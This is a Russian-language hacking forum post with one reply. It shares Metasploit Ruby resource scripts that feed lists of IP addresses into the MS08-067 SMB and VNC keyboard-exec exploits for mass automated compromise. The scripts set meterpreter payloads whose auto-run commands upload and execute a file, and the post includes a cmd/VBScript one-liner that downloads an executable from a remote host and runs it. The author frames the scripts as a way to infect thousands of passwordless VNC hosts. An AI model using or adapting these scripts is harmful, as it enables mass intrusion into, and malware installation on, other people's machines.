Увидел тему одну, код написан был на bash, открывал по 20 терминалов, смысл был в том, что загружаешь список ip, и файл инсталлится на тачке, которую смог пробить эксплоит, сейчас тот шелл код уже не работает, но есть возможность по-другому загрузить и исполнить файл. Проще всего подрубать скрипт примерно так: Code: multi_console_command -rc /root/Desktop/rrr.txt , ну и в сам txt файл вписать доступные команды примерно такова вида: Code: upload /root/server.exe c:\\server.exe execute -f C:\\server.exe Для семерки пути другие. Решил сделать что-то подобное ну и вот,собственно, что получилось, вместо bash написал на ruby. В видео я не стал показывать,как заливаю файл,а просто подрубил скрипт для создания учеток. Ну и вот само видео: http://youtu.be/LhinAumm5c4
Code: <ruby> lport = 10000 loop do Thread.new do File.open("/root/gg.txt","r") do |file| file.each_line do |ip| run_single("use exploit/windows/smb/ms08_067_netapi") run_single("set LHOST 192.168.1.172") run_single("set PAYLOAD windows/meterpreter/bind_tcp") run_single("set LPORT #{lport}") run_single("set RHOST #{ip}") #run_single("set TARGET 1") run_single("set InitialAutoRunScript multi_console_command -rc /root/rc.txt") run_single("exploit -j") lport+=1 end end end break end </ruby>
Как то прочитал статью что без парольных vnc аж 40к в инете, ну и руками тоже не вариант заливать. Почти тоже самое только укажем новый эксплоит и изменим настройки нашего палоада. Code: <ruby> lport = 10000 loop do #Thread.new do File.open("/root/5900.txt","r") do |file| file.each_line do |ip| run_single("use exploit/multi/vnc/vnc_keyboard_exec") run_single("set RHOST #{ip}") run_single("set LPORT #{lport}") run_single("set TARGET 0") run_single("set PAYLOAD windows/meterpreter/bind_tcp") run_single("set InitialAutoRunScript multi_console_command -rc /root/rc.txt") run_single("exploit -j") lport+=1 end end #end break end </ruby> Если в первом случае у нас палоад был upload /root/server.exe c:\\server.exe execute -f C:\\server.exe Тут будет Code: execute -H -f cmd.exe -a '/c echo Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP"):oXMLHTTP.Open "GET", "http://IP/44444/not.exe", 0 :oXMLHTTP.Send:Set oADOStream = CreateObject("ADODB.Stream"):oADOStream.Mode = 3:oADOStream.Type = 1:oADOStream.Open:oADOStream.Write oXMLHTTP.responseBody:oADOStream.SaveToFile "not.exe", 2: createobject("Wscript.Shell").run "not.exe": > 222.vbs & cscript 222.vbs'
А нелегче просто на python-e написать ? . Скажем используя subprocess или multiprocess если надо использовать именно metasploit ? А так вообще будет лучше все написать на C++ или Python ! P.S : Конечно только если для одного протокола (rdp) и без эксплоитов.